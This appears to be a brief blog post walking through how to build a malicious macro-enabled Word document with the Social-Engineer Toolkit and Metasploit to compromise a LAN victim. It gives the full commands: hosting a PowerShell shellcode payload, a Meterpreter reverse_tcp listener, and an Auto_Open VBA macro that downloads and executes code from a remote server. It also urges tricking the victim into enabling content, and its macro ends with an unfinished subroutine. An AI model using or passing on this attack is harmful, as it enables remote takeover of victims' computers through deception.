MS Word Macro Exploit

1 minute read

Description:

The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.

What you will need:
Microsoft Word
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)

To Resolve:

  1. Create the payload. On Kali, open terminal and type: setoolkit

  2. Type 1 then 9 then 1 for powershell alphanumeric shellcode injector.

  3. Fill in the LHOST variable which is your IP. This attack assumes you are on the local subnet of your victim. Then fill out the LPORT which is the port you want the attack to come back on. People typically keep this at 4444 but you can choose whatever. Type no to the start listener now.

  4. Now move the payload to your web server:

    1
2

    mv /root/.set/reports/powershell/x86\_powershell\_injection.txt /var/www/html/payload.txt  
service apache2 start

  5. Now we setup the listener:

    1
2
3
4
5
6
7

    msfconsole  
use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp  
set LHOST 10.10.10.200  
set LPORT 4444  
exploit

  6. Now we need to add the command to our MS Word document:

    • Open up a blank MS Word doc and name is something like attack.docm and make sure that it is macro-enabled.

    • Go to the “View” tab => Macros => “Auto_Open” / attack.docm => Create => (paste in the following:)

    1
2
3
4
5
6
7
8
9

    Sub Auto_Open()  
Dim exec As String  
exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))"""  
Shell (exec)  
End Sub  
Sub AutoOpen()  
Auto_Open  
End Sub  
Sub Workbook_Open()

    • At this point, you may want to obfuscate the code, but many people don’t even know how to get to the macro’s section of Word, much less what macro’s even are so we will skip this step. If you want to know, read the article in the reference (the source).

    • Save the document

  7. Now we need to convince the victim that the document is safe. The article references word trickery such as to open the secure document, click "Enable Content".

References:

“Create & Obfuscate a Virus Inside of a Microsoft Word Document”

Comments

You May Also Enjoy